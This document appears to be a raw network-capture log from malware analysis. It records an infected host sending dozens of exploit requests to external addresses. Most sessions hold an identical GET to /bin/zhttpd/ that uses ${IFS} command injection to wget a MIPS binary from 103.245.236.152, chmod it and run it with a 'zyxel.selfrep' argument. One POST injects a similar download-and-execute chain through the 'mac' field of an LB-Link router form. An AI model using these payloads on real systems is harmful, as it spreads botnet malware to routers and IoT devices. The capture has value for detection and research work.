                                        Jan 14, 2024 16:18:42.406867981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3789192.168.2.1335276171.174.245.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406898975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3790192.168.2.1350236122.218.164.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406933069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3791192.168.2.1337254125.176.249.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406991959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3792192.168.2.1347398201.178.129.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407016993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3793192.168.2.1349660201.214.182.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407063961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3794192.168.2.1353622209.55.52.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407113075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3795192.168.2.1360132174.47.230.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407155991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3796192.168.2.134718248.149.44.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407192945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3797192.168.2.135511468.174.12.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407236099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3798192.168.2.1339530140.84.174.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.407284021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3799192.168.2.1336488206.71.150.758080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.613548040 CET380INHTTP/1.0 400 Bad Request
                                        Content-Type: text/html
                                        Server: httpd
                                        Date: Sun, 14 Jan 2024 07:18:42 GMT
                                        Connection: close
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Cache-Control: post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3800192.168.2.1351554175.241.252.98080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.639601946 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:42.930321932 CET103INHTTP/1.1 404 Not Found
                                        Content-Type: text/plain
                                        Content-Length: 30
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3801192.168.2.1337878188.127.31.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.415968895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3802192.168.2.13463504.91.169.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416007996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3803192.168.2.134973878.75.13.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416058064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3804192.168.2.1336674195.73.242.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416085958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3805192.168.2.1347062125.16.0.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416126966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3806192.168.2.135680260.201.175.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416160107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3807192.168.2.134809827.60.4.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416244984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3808192.168.2.1353826118.91.74.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416254044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3809192.168.2.1351908210.111.139.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416301966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3810192.168.2.1344122113.84.95.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416333914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3811192.168.2.1359430157.57.137.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416357994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3812192.168.2.1347098187.239.47.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416416883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3813192.168.2.1335796111.188.188.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416455984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3814192.168.2.1343936125.187.253.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416482925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3815192.168.2.134048645.217.4.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416532993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3816192.168.2.1353480173.138.247.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416548967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3817192.168.2.1355096130.21.26.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416599989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3818192.168.2.13403269.213.50.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416649103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3819192.168.2.1350054129.139.135.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416697025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3820192.168.2.134525259.25.142.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416745901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3821192.168.2.13602125.233.57.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416781902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3822192.168.2.1359926208.136.110.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416815042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3823192.168.2.135288214.44.115.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416846991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3824192.168.2.135950036.189.250.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416877985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3825192.168.2.1358568213.46.13.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.416981936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3826192.168.2.136034870.153.193.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417038918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3827192.168.2.134413845.79.51.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417062044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3828192.168.2.135934048.15.195.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417081118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3829192.168.2.1355864128.37.195.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417125940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3830192.168.2.134574641.195.75.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417165995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3831192.168.2.1339966122.139.106.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417233944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3832192.168.2.1340492144.86.47.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417263031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3833192.168.2.135646645.225.100.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417324066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3834192.168.2.1346082206.88.127.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417339087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3835192.168.2.1338674216.98.13.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417402983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3836192.168.2.1334376174.99.146.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417460918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3837192.168.2.1347318201.67.239.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417491913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3838192.168.2.1334158165.189.120.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417516947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3839192.168.2.1336094135.124.202.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417545080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3840192.168.2.135319499.188.147.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417578936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3841192.168.2.1349646141.17.114.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417628050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3842192.168.2.135754494.254.11.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417671919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3843192.168.2.1336644132.220.229.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417711973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3844192.168.2.1356328157.198.46.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417752028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3845192.168.2.133466483.88.69.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417793036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3846192.168.2.134933025.125.27.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417850971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3847192.168.2.134402671.244.206.170443
                                        TimestampBytes transferredDirectionData
